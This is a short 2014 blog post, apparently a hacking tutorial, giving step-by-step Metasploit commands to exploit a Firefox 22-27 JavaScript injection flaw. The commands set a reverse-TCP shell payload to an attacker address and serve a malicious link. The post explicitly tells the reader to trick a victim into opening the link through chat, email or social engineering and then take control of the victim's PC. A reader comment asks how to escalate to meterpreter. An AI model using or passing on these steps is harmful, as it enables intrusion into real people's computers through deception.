Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

at 11:21 PM Saturday, August 30, 2014
This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs

Exploit Targets
Firefox 22-27
Windows XP SP 3
Windows 7
Linux
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_webidl_injection
msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)
msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5
msf exploit (firefox_webidl_injection)>set uripath /
msf exploit (firefox_webidl_injection)>exploit


Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique


Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Labels: ,

1 comments:

Anonymous said...
September 4, 2014 at 3:16 AM

Hey sir raj im a fan of your blog... how you go far to meterpreter http://2.bp.blogspot.com/-64bqlEfPbOo/VAK-3sEGNdI/AAAAAAAAIiM/w0C4od48wGY/s1600/4.png

using "firefox/shell_reverse_tcp" payload to get sysinfo & many commands?

Post a Comment

Subscribe to: Post Comments (Atom)